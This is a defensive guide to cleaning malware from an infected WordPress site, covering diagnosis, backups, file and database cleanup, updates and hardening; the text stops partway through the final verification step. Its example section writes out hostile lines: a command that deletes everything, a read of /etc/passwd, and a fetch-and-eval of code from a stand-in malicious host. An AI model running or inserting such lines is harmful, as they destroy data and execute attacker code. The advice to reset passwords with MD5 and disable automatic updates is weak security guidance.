WordPress infected? A complete guide to removing malware and restoring security

1. Introduction

WordPress is one of the most popular platforms for creating websites. Thanks to its ease of use, flexibility, and a huge number of available themes and plugins, it is used by both amateurs and professionals. Unfortunately, its popularity also has a dark side. Being such a widely used system, WordPress has become a target for cybercriminals. One of the most dangerous threats you may encounter is malware.

What is malware and why is it dangerous?

Malware (short for “malicious software”) is a broad term for all kinds of programmes or scripts created to cause damage. It can be something as simple as advertisements displayed on a website without your consent, but in the worst cases it can be something much more serious, such as data theft, injection of malicious code, or complete takeover of the website by third parties.

In the context of WordPress, malware can take many forms:

• Backdoors – a special type of malicious code that gives attackers access to your website even after it has been repaired. It works in secret, which often makes it difficult to find.
• Phishing – attackers can place fake login forms or payment pages on your website in an attempt to steal user data.
• Redirects – malware can cause your website users to be automatically redirected to other malicious websites that may contain viruses or phishing.
• SEO spam – hackers can inject hidden links into your website that lead to external sites in order to manipulate search results. This not only affects the reputation of your website, but can also lead to your website being blocked by search engines.
• Cryptojacking – attackers can inject a script that uses server resources to mine cryptocurrencies. This type of malware often slows down the website and its hosting.

What are the symptoms of an infected website?

It is not always easy to notice that your website has been infected. Malware often runs in the background without immediately revealing its presence. However, there are some symptoms that may indicate an infection:

1. Slow website performance – a sudden, significant slowdown in page loading may be the result of malware that is putting a strain on server resources.
2. Unexpected redirects – if you notice that your website is redirecting visitors to other, suspicious websites, it is highly likely that it has been infected.
3. Browser warnings – browsers such as Google Chrome may display a warning before visiting your website, informing users that the website may contain malware.
4. Your website disappearing from search results – Google may remove infected websites from search results to protect users from threats. If your website suddenly disappears from search results, this may be a sign that it is infected.
5. Strange changes in files – the appearance of new files on the server or changes to files that you did not make yourself may indicate the presence of malware.
6. Strange website behaviour – the display of unknown advertisements, messages or changes to the appearance of the website without your intervention is also a sign that something is wrong.

Why is a quick response important?

Once your website is infected, time is working against you. The longer the malware remains on your website, the greater the damage can be:

• Reputation loss: Users who visit your infected website may lose trust and not return to you in the future. Threat warnings can also negatively impact your brand.
• Penalties from Google: If Google detects that your site is infected, it may impose sanctions such as removing it from search results or displaying warnings before users can access the site.
• Data theft: With some types of malware, attackers can intercept sensitive information such as user login details or payment details.
• Loss of resources: Malware such as cryptojacking can put a significant strain on your server, which can lead to increased costs or even suspension of your site by your hosting provider.

In summary, malware on WordPress is a serious threat that can negatively impact your website’s performance, search engine ranking, and user trust. Understanding what malware is, what its symptoms are, and why a quick response is essential is the first step in effectively combating this problem.

2. Step 1: Diagnosing the problem

When you suspect that your WordPress site has been infected, the first step is to diagnose the problem. Without a thorough analysis, it will be difficult to determine exactly what happened and what actions are needed to clean up the site. It is important not to rely solely on plugins and online tools, which can give a false sense of security, especially when the site has already been infected. Hackers often use advanced techniques to hide malicious code that may be invisible to standard tools.

How to recognise an infection?

The first step is to gather as much information as possible about suspicious activity on the website. Before resorting to specialised tools, it is worth paying attention to a few basic symptoms that may indicate an infection:

1. Warnings from Google or other browsers: Google and other browsers (e.g. Chrome) may display a warning that your website has been marked as unsafe. These types of warnings are often associated with the presence of malware that can cause redirects or install malicious software on visitors’ computers.
2. Unexpected changes to the website: If you notice strange content, links to unknown websites, or additional scripts, it is very likely that your website has been infected.
3. Unauthorised file changes: An infection can cause changes to your website files, such as wp-config.php, functions.php, or even the main WordPress files. It is worth comparing these files with the originals to identify any unknown changes.
4. Signals from users: Sometimes users can inform you about problems with your website, e.g. strange redirects, unwanted advertisements or browser warnings.

Tools for diagnosing the problem

When you notice suspicious symptoms indicating an infection, it is crucial to thoroughly diagnose the problem. There are many plugins and online tools on the market that promise to scan your website for malware. However, it is important to know that these tools often prove ineffective for websites that are already infected. Why? Online tools do not have direct access to server files – they only analyse what they can see from the outside. As a result, many threats may remain undetected, especially if the malicious code is hidden deep in PHP files or a database.

Popular plugins such as Sucuri SiteCheck, Wordfence, and MalCare, while helpful in monitoring your website, are not always effective at detecting advanced malware. Hackers often design malware in such a way that it avoids detection by these tools. As a result, using them can give a false sense of security – the site appears clean, while malicious code continues to operate in the background.

Only an experienced programmer with full access to the server files and logs is able to effectively analyse the problem. Through manual analysis and the use of more advanced tools, such as PHP Malware Scanner or PHP-Antimalware-Scanner, it is possible to accurately identify the infection and remove hidden malware, which is not possible with standard plugins or online scanners.

1. PHP-Antimalware-Scanner
   PHP-Antimalware-Scanner is an advanced malware diagnosis tool focused on PHP files. It runs locally and compares files on the server with a database of known malware patterns. The tool is regularly updated, which increases its effectiveness in detecting new threats.

How to use PHP-Antimalware-Scanner:

• Download the tool from the GitHub repository and place it on your server.
• Run the script via the console or from the file management panel.
• After the scan is complete, the tool generates a report with the results, indicating potentially malicious files and code fragments.

Advantages:

• Regularly updated threat database, allowing for the detection of new types of malware.
• It runs locally, providing full access to all files on the server.
• Creates detailed reports with results, making it easy to review and remove infected files.

Disadvantages:

• Like PHP Malware Scanner, it requires access to the server and basic technical knowledge.
• It can generate a large number of results, which requires manual review and therefore more work.

1. PHP Malware Scanner
   PHP Malware Scanner is another open-source tool that has been specifically designed to scan PHP files for malware. It runs locally, directly on your server, giving it access to all files and not limiting itself to what can be seen from the outside.

How to use PHP Malware Scanner:

• Download the script from the GitHub repository and place it on your server.
• Run the scan via the command line or the file management panel in your hosting.
• The tool will scan the PHP files on the server and indicate potentially dangerous code fragments that need to be manually reviewed and removed.

Advantages:

• It runs locally on the server, allowing for deeper analysis than online tools.
• Effectively detects unusual code fragments that may be overlooked by popular WordPress plugins.
• Simple installation and use, no need to install plugins in WordPress.

Disadvantages:

• Requires access to the server and basic knowledge of working with the command line.
• Scan results may generate false positives, which means that the results must be analysed manually.

Both tools are powerful solutions for developers and administrators who have access to the server. They enable a deeper diagnosis of an infected site that cannot be performed by standard plugins or online scanners. However, using these tools requires some technical knowledge, so less experienced users may need the help of a professional.

Examples of malicious code

Malicious code on WordPress websites can take many forms, often using PHP functions that enable malicious actions. Hackers often hide malware using complex mechanisms to avoid detection. Below are some examples of common functions that can be used to hide and execute malicious code:

1. base64 – This function is used to encode and decode data. Hackers often use it to mask malicious code, which is then decoded and executed.Example:
   eval(base64_decode('ZWNobyAiSGVsbG8gd29ybGQiOw=='));
2. str_rot13 – Used to replace letters in a string. Malicious code can be masked using this function and only reveals its true functionality after the letters have been rotated.Example:
   eval(str_rot13('riny("Uryyb Jbeyq!");'));
3. gzuncompress – Allows compressed code to be decompressed, which can then be executed. This function is often used to hide malicious software.Example:
   eval(gzuncompress(base64_decode('eJzLSM3JyVcozy/KSQEAGgsEXQ==')));
4. eval – One of the most dangerous functions, as it executes PHP code passed as a string. This is a common technique used by attackers to run malicious code on a website.Example:
   eval($zlosliwyKod);
5. exec – Allows system commands to be executed on the server. Used to execute malicious scripts or commands that can modify or delete files.Example:
   exec('rm -rf /');
6. system – Similar to exec, this function allows you to execute system commands and return results. It can be used to gain unauthorised access to the file system.Example:
   system('cat /etc/passwd');
7. assert – This function can be used similarly to eval, which makes it equally dangerous. It allows you to execute PHP code passed as an argument.Example:
   assert('$a = 5; echo $a;');
8. preg_replace (with the /e option) – The preg_replace function with the e option allows regular expressions to be executed and PHP code to be run, which can be used to inject malicious software.Example:
   preg_replace('/.*/e', 'malware_code()', $input);
9. move_uploaded_file – This function allows you to move files uploaded by the user. Attackers can use this function to upload and execute a malicious PHP file on your server.Example:
   move_uploaded_file($_FILES['file']['tmp_name'], '/path/to/destination.php');
10. stripslashes – A function used to remove slash characters from a string. While not malicious in itself, it can be part of more complex attacks that manipulate input data.Example:
    $clean_input = stripslashes($_POST['input']);
11. file_get_contents – This function retrieves the contents of a file or web page and returns it as a string. It can be used to retrieve malicious code from external sources, which is then executed on the infected site.Example:
    $malicious_code = file_get_contents('http://zlosliwa-strona.com/zlosliwy_kod.txt'); eval($malicious_code);

The attached images show examples of code that may be the result of malware infection. Code fragments are often obfuscated, i.e. encrypted or masked, to make them difficult to detect by security plugins.

This PHP code snippet shows a typical example of using the base64_decode and file_get_contents functions. Attackers can use these functions to download external resources (such as files with malicious code) and decode them.

The file appears to be disguised as a GIF image (GIF89a), but in reality it contains binary data. This technique is known as “malware disguise” – attackers hide malicious code in multimedia files to confuse administrators and antivirus programmes. The code can be hidden in the image header and executed when the file is called by the server. This is a typical way to inject code into files that do not arouse suspicion.

This image shows a complex piece of malicious code that uses base64_decode to decode previously encoded data. The variable $vNB07PHP contains an encoded array that looks like masked characters to make code analysis more difficult. A long string of text is decoded, which may suggest that this is code that will be executed later. You can also see the eval function, which will ultimately run this decoded code, which may lead to the execution of malicious instructions.

Another example of encoded malicious code. The code uses global $GLOBALS arrays with random keys, which further complicates the identification of the code’s intentions. Each key and value is random and encoded, suggesting that this code can dynamically generate or retrieve malicious instructions. The complex structure of the file indicates an attempt to hide malicious code deep within PHP files, which is often used by hackers to prevent their code from being detected by simpler security scanners.

The code in this image shows a function that manipulates data by transforming it using the base64_decode function and hidden character strings. The djshb function decodes the malicious code, which is then passed to the $lvkxb variable and likely executed. The code is heavily obfuscated, meaning that its main purpose is to hide it from administrators and security systems.

This image shows code that uses the file_get_contents function to retrieve data from external sources. These are external text files that may contain malicious code or links that can redirect visitors to dangerous websites.

3. Step 2: Isolate and back up your site

Once you have identified that your WordPress site has been infected with malware, the next crucial step is to isolate the site and make a backup. This step is essential to minimise damage and to be able to restore a clean version of the site in case the malware removal attempt fails. Acting without backing up can lead to data loss or complete damage to the site.

Disabling the site in maintenance mode

The first step after detecting malware should be to disable the website for external users. This will prevent visitors from being exposed to potential threats such as redirects to malicious websites, data theft or infection of their devices.

How to disable a WordPress site in maintenance mode:

1. Use a maintenance mode plugin – There are many WordPress plugins that allow you to quickly switch your site to maintenance mode, such as Maintenance Mode or WP Maintenance Mode. These types of plugins display information about work being done on the site to users, while allowing the administrator full access.
2. Manual file editing – You can also manually add a maintenance page by editing the .htaccess file on the server, which will block access to the site except for the administrator.Code example:
   RewriteEngine On RewriteCond %{REMOTE_ADDR} !^123.456.789.000 RewriteRule .* /maintenance.html [R=503,L]

In this example, users will see the maintenance.html page, and you, from the specified IP address (123.456.789.000), will have access to the site to repair it.

1. Closing access to the admin panel – In critical cases, you can also temporarily restrict access to the WordPress admin panel to minimise the risk of further attacks.

Performing a full backup

Next, before taking any corrective action, make a full backup of the site – both files and database. This will ensure that if the repair process fails or key files are accidentally deleted, you can restore the site to its previous state.

How to back up WordPress:

• Manual backup of website files:

• Connect to the server using FTP or SFTP protocol with an FTP client, e.g. FileZilla.
• Locate the WordPress root directory (usually the public_html or www folder).
• Download all files from the directory to your local computer to secure the entire website structure, including:
  • Themes
  • Plugins
  • Media (images, PDF files, etc.)
  • Important WordPress files (e.g. wp-config.php, .htaccess).

• Manual database backup:

• Log in to the database management panel, such as phpMyAdmin.
• Select the database used by WordPress (the database name can be found in the wp-config.php file).
• Click “Export” and then select the Quick export method and SQL format.
• Save the SQL file locally on your computer. This file contains all posts, pages, comments, users, and other website data.

• Automatic backups:

• You can also use WordPress plugins to create backups, such as UpdraftPlus, Duplicator, or BackupBuddy. These plugins can automatically back up your files and database and store them in the cloud (e.g., Dropbox, Google Drive) or locally.
• It is worth ensuring that these plugins are not infected, especially if the site has already been attacked, so it is always recommended to perform a manual backup.

Where to store the backup?

1. Remote locations – It is recommended to store your backup on an external server, in the cloud (e.g. Google Drive, Dropbox) or on an external drive. This will allow you to access your files even if the server hosting your website becomes infected or damaged.
2. Local copies – You can also store your backup on your computer or local server. Make sure that this location is well protected against potential attacks or failures.

Tips for secure backup storage:

• Store backups in different locations – To minimise risk, store backups in at least two different locations, e.g. on an external server and locally on your computer.
• Back up regularly – Backing up should be a regular activity, not just in case of infection. This ensures that you always have the latest version of your website.
• Test restoring from backup – Regularly testing whether backups can be restored is crucial to avoid surprises in the event of a failure. Some backups may be corrupted or incomplete, which can lead to additional problems.

Isolating your website and making a backup are essential steps to minimise the damage caused by a malware attack. By doing so, you can protect your users from threats and ensure that you have a backup version of your website in case of complications during malware removal. Only after securing a backup can you safely proceed to remove the malicious code and repair the website.

4. Step 3: Removing malware

Once you have backed up and isolated your website, the next crucial step is to manually remove the malware. Automatic tools, such as plugins, may not be fully effective, so in the case of advanced infections, manual action is necessary to restore the website to full functionality. In this step, we will focus on removing suspicious files and folders and analysing the wp-content directory, where infected files are usually located.

Malware removal – manual analysis

One of the most effective ways to clean an infected WordPress site is to remove all files and folders except those that contain your data, i.e.:

• The wp-content directory – It contains all themes, plugins, and uploaded media files.
• The wp-config.php file – This contains your database settings and website configuration.

The rest of the files should be deleted and replaced with new ones downloaded directly from the official WordPress website. Remember to make sure that the original version you download is compatible with the one you currently have installed! We will discuss updates later.

Deleting and restoring the original WordPress files

• Delete infected files and folders:

• • Connect to the server using an FTP client (e.g. FileZilla) or log in to your hosting file management panel.
  • From the root directory of your WordPress site, delete all files and folders except:
    • wp-content – Contains your data, plugins, themes, and uploaded media.
    • wp-config.php – Contains configuration information, including database access details.
  • Files and folders to be deleted include:

• wp-admin/

• • wp-includes/
  • All PHP files in the root directory, except wp-config.php.

• Download the original WordPress files:

• • Go to the official WordPress website (https://wordpress.org/download/) and download the latest version of WordPress that is compatible with your currently installed version.
  • Unzip the downloaded ZIP archive and upload the clean folders and files to the server:

• wp-admin

• wp-includes

• • All PHP files in the root directory.

This way, you can be sure that your website’s core files are clean and free of malware.

Manual analysis of the wp-content directory

The wp-content directory is where all user files such as themes, plugins, and uploaded files (images, documents) are stored. Unfortunately, malware often hides in this directory because it contains custom files that can be infected or replaced by hackers.

• Analysis of themes and plugins:

• The wp-content/themes directory contains themes that may be infected. The best solution is to delete all themes except the one currently in use.
• Re-upload the original theme files from the WordPress repository or from the theme provider.
• Carefully review the functions.php, header.php, footer.php, and other theme files that may contain malicious code (such as additional JavaScript scripts, redirects, base64-encoded text, etc.).

For the wp-content/plugins directory:

• Remove all suspicious plugins and plugins that you do not recognise or that have not been updated recently.
• Analyse the plugin files, especially those that use functions such as eval(), base64_decode(), file_get_contents(), exec(), etc. These functions can be used to inject malware.
• Re-upload clean versions of the plugins from the WordPress repository or the plugin provider’s website.

• Review uploads and other media files:

• The wp-content/uploads directory stores all uploaded media files (images, PDFs, etc.). Carefully review this folder for unusual files, such as PHP files (e.g., shell.php) that should not be in this directory, or others whose names consist of random strings.
• Ensure that the directories intended for media files (e.g. /uploads/) contain only media files (JPG, PNG, GIF, PDF). Delete any PHP files or files with suspicious names that should not be there.

• Analysis of files indicated by malware scanning tools:

• Use the aforementioned tools, such as PHP Malware Scanner and PHP-Antimalware-Scanner, which will indicate potentially infected files. These tools can help identify PHP files that contain unusual or malicious functions.
• Based on the scan results, manually review the files flagged as suspicious, paying attention to encoded fragments such as base64_decode(), eval(), system(), etc.

Additional steps after cleaning the files

After completing the manual analysis and removing the malware, perform the following steps:

1. Update passwords:

• Change all passwords related to your website, including the WordPress admin panel password, databases, FTP, and hosting accounts.
• Consider enabling two-factor authentication (2FA) for WordPress administrator accounts.

• Check file and folder permissions:

• Ensure that directories have the correct permissions (usually 755 for directories and 644 for files). The wp-config.php file should have more restrictive permissions, e.g. 600, to protect key configuration data.

Manually removing malware from WordPress files requires meticulousness and precision. Deleting all files except the wp-content directory and the wp-config.php file and re-uploading clean WordPress files is an effective method of removing infections from core files. In turn, manually analysing the wp-content directory will allow you to thoroughly check custom files such as themes, plugins, and uploaded media that may be infected.

Keep in mind that each infection may vary depending on the type of attack, so thorough analysis and removal of all suspicious files are crucial in the process of cleaning up your WordPress site.

5. Step 4: Clean and repair the database

After removing malware from WordPress files, the next important step is to clean and repair the database. Malicious code is often not limited to files, but can also be injected into the database. Hackers can inject malicious JavaScript scripts, spam links, or backdoors directly into database records, especially into tables related to posts, comments, or users. That is why it is so important to thoroughly check and clean the database after an infection.

Manual database analysis

The best way to identify malicious code in a database is to manually analyse key tables. Malicious software often targets fields related to content (posts, pages, comments) or page settings.

How to perform a manual analysis:

1. Access the database:
   • Log in to the database management panel, such as phpMyAdmin or another database management tool.
   • Find the database used by your WordPress site (you can find its name in the wp-config.php file, in the DB_NAME field).
2. Check key tables: Focus on tables that are most often targeted. For WordPress, these are:
   • wp_posts – This table stores the content of posts and pages. Malicious scripts can be injected into the post_content, post_excerpt, or post_title fields. Check these fields for unusual fragments, such as encoded text (base64), JavaScript scripts, or suspicious links.
   • wp_comments – A table containing comments, where hackers can inject spam links or code.
   • wp_options – This table contains the site settings. Malicious software can inject backdoors or scripts here that can be executed in the administration panel.

Example of malicious code in the database: In fields such as post_content, you may encounter fragments of malicious code such as:

<script>alert(‘hacked’);</script>

or

<iframe src=”http://malicious-site.com“></iframe>

• Filtering results:

• To find suspicious data more quickly, use the search functions available in phpMyAdmin. You can search the wp_posts table for suspicious code snippets:
  • script>
  • iframe>
  • base64 These phrases may indicate the presence of malicious code in the content of posts or pages.

Repairing and removing suspicious records

Once you have identified infected records in the database, you need to clean them up.

How to manually repair infected records:

• Edit records – If you identify malicious code in records, e.g. in the post_content field, you can manually edit the entry in phpMyAdmin. Select Edit for the record and remove all suspicious code fragments.
• Delete records – If you find suspicious or unnecessary records that appear to be the result of an attack (e.g. spam comments or unauthorised posts), you can safely delete them. In phpMyAdmin, select the record and choose the Delete option.

Examples of SQL commands for cleaning up the database

In some cases, malicious scripts may be located in multiple places in the database. To speed up the removal process, you can use SQL queries that allow for mass data cleaning.

Example SQL commands:

1. Removing malicious code from post content: If malicious code (e.g. iframe) has been injected into the content of posts, you can run the following SQL query to remove it:
   UPDATE wp_posts SET post_content = REPLACE(post_content, “<iframe src=”http://malicious-site.com”></iframe>”, ”);

This query will find all instances of iframe with the given URL and remove them.

1. Removing malicious JavaScript code: If you identify injected JavaScript scripts, you can run the query:
   UPDATE wp_posts SET post_content = REPLACE(post_content, ‘<script>alert(“hacked”);</script>’, ”);

You can adapt this query to different cases, depending on the code you want to remove.

1. Removing suspicious comments: If spam comments have been injected into the wp_comments table, you can remove them based on specific keywords, such as links to phishing sites:
   DELETE FROM wp_comments WHERE comment_content LIKE ‘%http://malicious-site.com%’;

Database optimisation and repair

After cleaning the malicious code from the database, it is also worth optimising the database and repairing any damage caused by malware.

1. Database repair:
   • In phpMyAdmin, select all tables in the database.
   • From the drop-down menu, select Repair Table. This tool will automatically repair any damage to the table structure.
2. Database optimisation:
   • After repairing, select the Optimize Table option, which will help improve database performance after removing the malicious code.

Regular database scanning

After manually cleaning the database, it is a good idea to monitor its contents regularly in the future to prevent further infections.

Cleaning and repairing the database is a key step in the malware removal process. Malicious software can modify records, inject spam links, JavaScript scripts or backdoors. A thorough manual analysis of the database, repair of damaged records and removal of infected data allows the website to be restored to full functionality.

6. Step 5: Update WordPress, plugins, and themes

After cleaning the files and database of malware, it is extremely important to update WordPress, plugins, and themes to the latest versions. Hackers often exploit security vulnerabilities in older versions of WordPress, plugins, and themes to inject malware. Therefore, keeping all website components up to date is key to preventing future attacks.

Additionally, it is important to ensure that your website is running on the correct version of PHP, as older versions may contain known security vulnerabilities that are exploited by hackers.

Updating the WordPress core

The first step is to update the WordPress core to the latest available version. WordPress updates not only bring new features, but also introduce security fixes that can protect your website from new attacks.

How to update WordPress:

1. Log in to the WordPress admin panel (wp-admin).
2. Go to the Dashboard → Updates section.
3. If your version of WordPress is out of date, you will see a message informing you that an update is available. Click the Update Now button.

Once the update is complete, make sure everything is working properly. Sometimes an update can affect the compatibility of plugins or themes, so it is important to thoroughly test your site after each update.

Checking plugin and theme compatibility with the new version of WordPress

After updating the WordPress core, it is crucial that all installed plugins and themes are compatible with the new version. Using incompatible plugins or themes can lead to errors on your website and, worse, can open up new security vulnerabilities that can be exploited by hackers.

Checking plugin compatibility:

1. Log in to the WordPress admin panel and go to the Plugins tab.
2. For each plugin, check if an update is available. WordPress will display a message if a new version is available.
3. Click Update Now to install the latest version of each plugin.
4. Make sure that each plugin is compatible with the latest version of WordPress. You can find compatibility information on the plugin page in the WordPress repository.

Checking theme compatibility:

1. Go to the Appearance → Themes tab.
2. If an update is available for your theme, you will see an Update Now button. Click it to update your theme to the latest version.
3. After updating, test your site for theme compatibility with the new version of WordPress. Make sure that the theme works correctly and that there are no problems with the display or functionality of the site.

Why is compatibility crucial?

• Outdated or incompatible plugins may contain security vulnerabilities that can be exploited by hackers. Some older plugins may also be abandoned by developers, which means no support and no fixes.
• An incompatible theme can cause problems with the display of the website and, in extreme cases, can lead to its complete shutdown.

PHP version requirements

Another key element of protecting your website from attacks is ensuring that it runs on the correct version of PHP. Older versions of PHP, such as 7.3 or earlier, may have outdated features and known security vulnerabilities that are exploited by cybercriminals.

How to check and update your PHP version:

1. Check your current PHP version:
   • Log in to your hosting administration panel and go to the section related to PHP versions (often found under the PHP Settings or PHP Versions tab).
   • See which PHP version your website is running on. If it is older than 7.4, it is recommended that you update to the latest stable version (currently PHP 8.2 or 8.3).
2. Update PHP on the server:
   • In the hosting panel, find the option to change the PHP version. Most hosting providers allow you to change the PHP version directly from the panel.
   • Select the latest stable version of PHP (e.g. PHP 8.2) and save the changes.

Why is updating PHP important?

• Newer versions of PHP not only offer better performance, but also security fixes and support for modern features. This also benefits website performance, as newer versions of PHP are more optimised.
• WordPress and many popular plugins are gradually dropping support for older PHP versions, so staying on an old version may prevent you from updating in the future.

Test your website after updating PHP: After changing the PHP version, thoroughly test your website to ensure that all features are working correctly. Pay particular attention to compatibility with themes and plugins.

Final check after updating

After updating the WordPress core, plugins, themes, and PHP version, it is important to perform a final check:

1. Test all website functionality – Test key elements of the website, such as forms, product pages, payment systems, comments, etc., to ensure that everything is working correctly.
2. Check theme and plugin compatibility – Thoroughly test all themes and plugins to ensure they are fully compatible with the new version of WordPress and PHP.
3. Pay attention to website performance – Monitor page load times and overall performance after the update. New versions of PHP and WordPress can significantly improve website performance.

Updating WordPress, plugins, themes, and PHP versions is a crucial step in securing your site against future attacks. Not only does this improve website performance, but it also protects against security vulnerabilities that are often exploited in older versions. Regularly checking the compatibility of all website elements and keeping them up to date is a fundamental part of protecting your WordPress website from cyber threats.

6. Step 6: Change passwords and login details

After removing malware, cleaning the database, and updating WordPress and its components, the next crucial step is to change passwords and login details. This is one of the most important steps to prevent attackers from continuing to access your site. Malware often injects backdoors or steals login details, so make sure all accounts have new, strong passwords.

It is necessary to change passwords not only for the main administrator, but also for all users who have access to the wp-admin administration panel. This includes all users with roles that allow access to the back-end of the website, such as: Administrator, Editor, Author, and Contributor, if they have the ability to log in to the panel.

Changing passwords for WordPress accounts

Changing passwords for WordPress users is a crucial step after removing malware. Depending on the number of users and their roles, this process may involve administrators, editors, and authors.

How to change passwords for users in the WordPress admin panel:

1. Log in to the WordPress admin panel as the main administrator.
2. Go to the Users tab → All Users.
3. In the user list, you will see all users with different roles. Focus on users who have access to the admin panel, such as:
   • Administrators – They have full access to the site, including settings, plugins, themes, and content management.
   • Editors – They can publish and manage posts for all users.
   • Authors – They can publish their own posts.
   • Contributors – They can create posts, but they require approval from an editor or administrator to publish them.
4. For each user, click the Edit button, then scroll down to the Password Management section.
5. Generate a new, strong password using WordPress’s built-in password generator or manually enter a new password. Ensure that the password meets the following criteria:
   • It is long (minimum 12 characters).
   • It contains upper and lower case letters, numbers, and special characters.
6. When you are finished, click the Update User button to save your new password.

Important: Repeat this process for all users who have access to the WordPress admin panel. Securing only the administrator account is not enough, as other accounts, such as editors and authors, can be potential targets for attack.

Force all users to change their passwords

To ensure complete security, it is recommended that you force all users who have access to the admin panel to change their passwords. This can be done manually by informing users of the need to change their passwords, or by using special tools.

How to force password changes:

1. Manual notification of users:
   • Send an email to all users with a role that allows access to the administration panel (Administrator, Editor, Author, Contributor), informing them of the need to change their password due to a security incident.
   • Ensure that you provide clear instructions on how to log in and change their password.
2. Reset all user passwords (manually in the database): If you want to reset passwords for all users, you can do so directly in the database using phpMyAdmin or a similar tool. Example SQL query to reset a user’s password:
   UPDATE wp_users SET user_pass = MD5(‘newpassword’) WHERE user_login = ‘username’;

Replace newpassword with your new password and username with the username whose password you want to reset.

Changing access passwords to the database, FTP, and hosting panel

After resetting WordPress user passwords, it is also important to update access passwords for other key resources, such as the database, FTP accounts, and hosting panel. Malicious software may have compromised the security of this data, so updating it is essential.

How to change access passwords for key resources:

1. Changing the database password:
   • Log in to your hosting panel and go to database management (often found in the MySQL Databases section).
   • Change the password for the database used by WordPress.
   • After changing the database password, update the wp-config.php file on the server. Open this file and edit the line with the database password:
     define(‘DB_PASSWORD’, ‘new_db_password’);
   • Save the file and upload it to the server.
2. Changing FTP and SFTP passwords:
   • Log in to your hosting panel and go to the FTP account management section.
   • Update the passwords for all FTP and SFTP accounts that have access to WordPress files.
   • Ensure that the new passwords are strong and comply with the recommendations for creating strong passwords.
3. Changing your hosting panel password:
   • Log in to your hosting administration panel.
   • Change the password for your main hosting account to secure access to all hosting services, such as databases, FTP, and other services.

Enabling two-factor authentication (2FA)

To further secure your website, it is recommended that you enable two-factor authentication (2FA) for all accounts with access to the WordPress admin panel. 2FA adds an extra layer of security by requiring users to confirm their login with a one-time code sent to their phone or app.

How to enable 2FA:

1. Install a 2FA application – Configure 2FA for every WordPress user with access to the admin panel using an application such as Google Authenticator, Authy, or Microsoft Authenticator.
2. Configure 2FA in WordPress – Log in to the admin panel and enable 2FA for users. You can do this using a plugin or built-in WordPress features (if available). Ensure that users know how to configure the 2FA application.

Changing passwords and login details is a critical step in securing your WordPress site after a malware attack. You should update the passwords for all users with access to the admin panel, as well as to key resources such as the database, FTP, and hosting panel. To further enhance security, consider enabling two-factor authentication (2FA), which will make it much more difficult for hackers to access your site. Ensure that all new passwords are strong, unique, and comply with best security practices.

7. Step 7: Preventing future infections

After removing the malware, cleaning the files and database, and restoring the site to full functionality, the key step is to secure the site against future infections. WordPress, being one of the most popular content management systems, is a frequent target for hackers, so proactive website security is essential to avoid recurring problems. In this section, we will discuss best practices and steps to help secure your site against future attacks.

Step 1: Configure access restrictions for files, folders, and the admin panel

One of the key aspects of securing your website is restricting access to files and folders and hiding any information about your website, such as the version of WordPress you are currently using. Hackers often exploit file permission vulnerabilities to gain unauthorised access to a website, inject malicious code, or take control of the system. The ability to easily check the version of our WordPress also makes it much easier to potentially find vulnerabilities in our website.

1. Restricting access to files and folders:

• • wp-config.php file – This file contains sensitive database information such as the database name, user name and password. It should be protected from unauthorised access.
    Recommendation: Set the permissions for the wp-config.php file to 600, which will restrict access to the file to the owner only.
  • WordPress core folders and files – Permissions should be set to prevent unauthorised persons from writing and editing files. In general:
    • Directories should have permissions set to 755.
    • Files should have permissions set to 644.

• Database data

• • In the wp-config.php file, find:// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */define( ‘DB_NAME’, ‘database_name_here’ );/** Database username */

    define( ‘DB_USER’, ‘username_here’ );

    /** Database password */

define( 'DB_PASSWORD', 'password_here' );

    /** Database hostname */

    define( ‘DB_HOST’, ‘localhost’ );

    /** Database charset to use in creating database tables. */
    define( 'DB_CHARSET', 'utf8' );

    /** The database collate type. Don’t change this if in doubt. */
    define( 'DB_COLLATE', '' );

• Copy to another file, e.g. wp-config-db.php
• Paste the following in place of the deleted code: require_once “wp-config-db.php”;

• Hide error display

• In the wp-config.php file, find:
  define(‘WP_DEBUG’, false);

• • Replace with:if ( ! WP_DEBUG ) {
ini_set('display_errors', 0);
}

• Disable the file editor

• In the same wp-config.php file, add the following below:
  define(‘DISALLOW_FILE_EDIT’, true);

• Block information about your website:

• In the .htaccess file, add the following at the beginning:
  <FilesMatch “wp-config.*.php|.htaccess|readme.html”>
  Require all denied
  </FilesMatch>

• • Remove the version from the head section:
    • In your theme’s functions.php file, add the following at the end:remove_action('wp_head', 'wp_generator');
function my_secure_generator( $generator, $type ) {
return '';
}add_filter( ‘the_generator’, ‘my_secure_generator’, 10, 2 );
      function my_remove_src_version( $src ) {global $wp_version;

      $version_str = ‘?ver=’.$wp_version;

      $offset = strlen( $src ) – strlen( $version_str );

      if ( $offset >= 0 && strpos($src, $version_str, $offset) !== FALSE )  {

      return substr( $src, 0, $offset );

      }

      return $src;

      }

      add_filter( ‘script_loader_src’, ‘my_remove_src_version’ );

      add_filter( ‘style_loader_src’, ‘my_remove_src_version’ );

• In the same file, to disable XMLRPC, add:
  add_filter('xmlrpc_enabled', '__return_false');
• Protect wp-includes
  • Add an .htaccess file and place the following code in it:<FilesMatch ".(?i:php)$">
Require all denied</FilesMatch><Files “wp-tinymce.php”>

    Require all granted

    </Files>

    <Files “ms-files.php”>

    Require all granted

    </Files>

• Protect wp-content and wp-content/uploads
  • Add an .htaccess file to both paths with the following content:<FilesMatch ".(?i:php)$">Require all denied</FilesMatch>

• Block automatic updates. Control what and when updates are made yourself!
  • Add the following to the end of the wp-config.php file:
    define( ‘WP_AUTO_UPDATE_CORE’, false );
  • Add the following to your theme’s functions.php file:add_filter( 'auto_update_plugin', '__return_false' )add_filter( ‘auto_update_theme’, ‘__return_false’ );

What should you avoid?

Some tips, although popular, do not always bring the expected results in terms of WordPress site security. Here are a few that are best avoided:

• Do not use “all-in-one” security tools
  All-in-one tools for website protection may seem tempting, but in reality:
  • They are often vulnerable to security breaches.
  • They give a false sense of security, which can lead to negligence in more critical areas.
• Do not change the wp-admin path
  Changing the default path to the admin panel does not provide better security:
  • Attackers will still find alternative paths such as /admin or /login.
  • Paths to wp-login.php and xmlrpc.php are processed faster by the server than 404 errors, which saves resources.

8. Step 8: Verification and reporting to Google

After removing the malware and restoring the site to full functionality, it is important to verify that the site is completely clean and report it to Google to remove any warnings displayed in search results. If Google detects malware on a website, it may mark it as unsafe, resulting in a drop in traffic and user trust.

Step 1: Verify that the site is clean

Before you report your website to Google, make sure it is completely clean of malware. Use diagnostic tools and manually verify that there are no traces of infection left.

How to verify that your website is clean:

1. Scan your website:
   • Again, use file and database scanning tools such as PHP Malware Scanner or PHP-Antimalware-Scanner.
